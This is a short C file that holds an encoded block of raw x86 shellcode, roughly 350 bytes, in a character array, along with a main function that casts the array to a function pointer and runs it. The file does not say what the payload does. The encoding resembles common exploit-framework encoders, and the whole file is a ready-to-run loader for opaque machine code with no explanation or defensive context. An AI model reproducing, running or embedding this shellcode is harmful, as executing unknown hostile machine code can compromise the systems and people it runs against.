#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char code[] = 
"\xbd\x15\x36\xd0\x4a\x31\xc9\xb1\x4f\xdb\xcb\xd9\x74\x24\xf4"
"\x5a\x31\x6a\x10\x03\x6a\x10\x83\xea\xfc\xf7\xc3\x2c\xa2\x7e"
"\x2b\xcd\x33\xe0\xa5\x28\x02\x32\xd1\x39\x37\x82\x91\x6c\xb4"
"\x69\xf7\x84\x4f\x1f\xd0\xab\xf8\x95\x06\x85\xf9\x18\x87\x49"
"\x39\x3b\x7b\x90\x6e\x9b\x42\x5b\x63\xda\x83\x86\x8c\x8e\x5c"
"\xcc\x3f\x3e\xe8\x90\x83\x3f\x3e\x9f\xbc\x47\x3b\x60\x48\xfd"
"\x42\xb1\xe1\x8a\x0d\x29\x89\xd4\xad\x48\x5e\x07\x91\x03\xeb"
"\xf3\x61\x92\x3d\xca\x8a\xa4\x01\x80\xb4\x08\x8c\xd9\xf1\xaf"
"\x6f\xac\x09\xcc\x12\xb6\xc9\xae\xc8\x33\xcc\x09\x9a\xe3\x34"
"\xab\x4f\x75\xbe\xa7\x24\xf2\x98\xab\xbb\xd7\x92\xd0\x30\xd6"
"\x74\x51\x02\xfc\x50\x39\xd0\x9d\xc1\xe7\xb7\xa2\x12\x4f\x67"
"\x06\x58\x62\x7c\x30\x03\xeb\xb1\x0e\xbc\xeb\xdd\x19\xcf\xd9"
"\x42\xb1\x47\x52\x0a\x1f\x9f\x95\x21\xe7\x0f\x68\xca\x17\x19"
"\xaf\x9e\x47\x31\x06\x9f\x0c\xc1\xa7\x4a\x82\x91\x07\x25\x62"
"\x42\xe8\x95\x0a\x88\xe7\xca\x2a\xb3\x2d\x7d\x6d\x24\x0e\xd6"
"\x70\xd1\xe6\x25\x72\x08\xab\xa0\x94\x40\x43\xe5\x0f\xfd\xfa"
"\xac\xdb\x9c\x03\x7b\x4b\x3c\x91\xe0\x8b\x4b\x8a\xbe\xdc\x1c"
"\x7c\xb7\x88\xb0\x27\x61\xae\x48\xb1\x4a\x6a\x97\x02\x54\x73"
"\x5a\x3e\x72\x63\xa2\xbf\x3e\xd7\x7a\x96\xe8\x81\x3c\x40\x5b"
"\x7b\x97\x3f\x35\xeb\x6e\x0c\x86\x6d\x6f\x59\x70\x91\xde\x34"
"\xc5\xae\xef\xd0\xc1\xd7\x0d\x41\x2d\x02\x96\x71\x64\x0e\xbf"
"\x19\x21\xdb\xfd\x47\xd2\x36\xc1\x71\x51\xb2\xba\x85\x49\xb7"
"\xbf\xc2\xcd\x24\xb2\x5b\xb8\x4a\x61\x5b\xe9";

int main(int argc, char **argv)
{
  int (*funct)();
  funct = (int (*)()) code;
  (int)(*funct)();
}